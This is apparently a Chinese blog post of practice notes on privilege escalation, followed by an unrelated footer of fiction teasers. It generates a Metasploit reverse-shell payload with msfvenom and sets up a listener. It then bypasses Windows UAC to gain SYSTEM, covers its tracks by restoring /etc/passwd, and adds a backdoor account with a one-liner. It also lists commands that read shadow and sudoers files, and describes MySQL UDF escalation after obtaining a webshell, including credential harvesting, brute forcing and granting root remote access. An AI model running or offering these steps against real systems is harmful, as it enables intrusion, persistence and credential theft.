2020-05-07windows uac、mysql udf提权操作、提权常用命令

一、完成windows UAC提权

木马生成:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=7777-f exe -o payload.exe

木马生成

将木马下载到物理机:sz payload.exe

将木马放在虚拟机中,最后双击运行

然后创建一个监听器

msfconsole

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) >  set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.0.103

lhost => 192.168.0.103

msf5 exploit(multi/handler) > set lport 7777

lport => 7777

msf5 exploit(multi/handler) > exploit

创建监听,木马已上线

输入getuid,查看当前用户,然后输入getsystem,尝试提权,发现失败

当前用户权限
提权失败

meterpreter > background

msf5 exploit(multi/handler) > sessions -i

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac

msf5 exploit(windows/local/bypassuac) > set session 1

msf5 exploit(windows/local/bypassuac) > exploit

meterpreter > getuid

meterpreter > getsystem

防止被发现,将自动备份的/tmp/passwd.bak覆盖etc/passwd,输入:mv /tmp/passwd.bak /etc/passwd,即可恢复之前的root权限

二、总结Linux提权常用命令和vi编辑器常用命令 

(1):内核,操作系统和设备信息 

 uname -a    打印所有可用的系统信息 

 uname -r    内核版本 

 hostname   系统主机名 

(2)用户和群组 

 cat /etc/passwd     列出系统上的所有用户 

cat /etc/shadow     列出系统上的所有用户密码  

 whoami              查看当前用户 

w                   谁目前已登录,他们正在做什么

 last                最后登录用户的列表 

 lastlog             所有用户上次登录的信息  

 (3)用户和权限信息: 

 whoami        当前用户名 

 id            当前用户信息 

 cat /etc/sudoers  谁被允许以root身份执行 

sudo -l       当前用户可以以root身份执行操作 

 (4)环境信息  

 history   显示当前用户的历史命令记录 

 pwd       输出工作目录 

 (5)linux 一句话添加账号 

 (1)chpasswd 方法 

 # useradd guest;echo'guest:123456'|chpasswd 

vi编辑器常用命令 

 打开文件:vi  /oldboy/oldboy.txt 

 编辑模式:i 

 保存并退出:esc退出、:wq保存退出 

 显示文件内容检查:cat /oldboy/oldboy.txt 

三、完成mysql udf提权操作

当获取到webshell时,我们可以先找一下它得连接数据库的账号和密码

如何获取mysql账号密码

1.查看网站配置文件。

   如:conn、config、data、sql、common、inc等。

连接数据库,输入密码

2.查看数据库安装路径下的mysql文件,安装目录为/data/mysql/user.myd和user.myi

3.通过暴力破解得到(hscan、Bruter、hydra、脚本木马)

如果用工具爆破的话,前提是打开root的远程访问权限

登录到mysql中,为root进行远程访问的授权,执行下面的命令:

 mysql>GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";

mysql>flush privileges;

UDF提权(自身功能提权)

1、工具UDF提权

当我们直接点击执行导入目录时,这是失败的如图

我们应该先找到myqsl这个目录

当mysql版本是大于等于5.1时,udf.dll文件是在 默认 C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll     因为我们这里是在C:\\php\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll

当小于5.1时,C:\\WINDOWS\\udf.dll   或  C:\\WINDOWS\\system32\\udf.dll


如果找不到    lib和plugin目录时,新建

然后将目录C:\php\MySQL-5.1.50\lib\plugin\复制到,然后点击执行,可能失败,那就将目录的   \  改为  /

成功

成功

然后执行默认的sql命令,只有创建了udf.dll文件才能执行命令,

也可以用脚本本地连接moon.php

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 202,980评论 5 476
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,178评论 2 380
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 149,868评论 0 336
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,498评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,492评论 5 364
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,521评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,910评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,569评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,793评论 1 296
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,559评论 2 319
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,639评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,342评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,931评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,904评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,144评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,833评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,350评论 2 342